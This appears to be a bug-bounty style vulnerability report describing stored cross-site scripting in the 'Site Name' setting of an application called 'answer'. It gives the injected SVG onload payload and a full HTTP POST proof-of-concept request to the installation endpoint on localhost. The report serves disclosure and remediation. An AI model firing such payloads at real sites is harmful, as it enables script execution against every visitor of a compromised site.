Description

answer has a feature to customize the "Site Name" during installation or in the settings page , due to a bad sanitization it allows to put arbitrary html code which allows to execute javascript code.

Everytime a user enter in the website, the xss is triggered.

Injected payload

"><svg onload=alert(1)//

Vulnerable endpoint:

1. https://<yourdomain>/admin/general
2. https://<yourdomain>/installation/base-info

Proof of Concept (in installation page)

POST /installation/base-info HTTP/1.1
Host: localhost:9080
Content-Length: 175
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
Authorization: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/install
Accept-Encoding: gzip, deflate
Connection: close

{"lang":"en_US","site_name":"\"><svg onload=alert(1)//","site_url":"http://localhost:9080","contact_email":"aaa@aaa.ss","name":"admin","password":"admin","email":"aaa@aaa.ss"}

i hope i was helpful.

Impact

The impact is JavaScript Code Execution. However, admin privileges are required to edit the vulnerable input fields.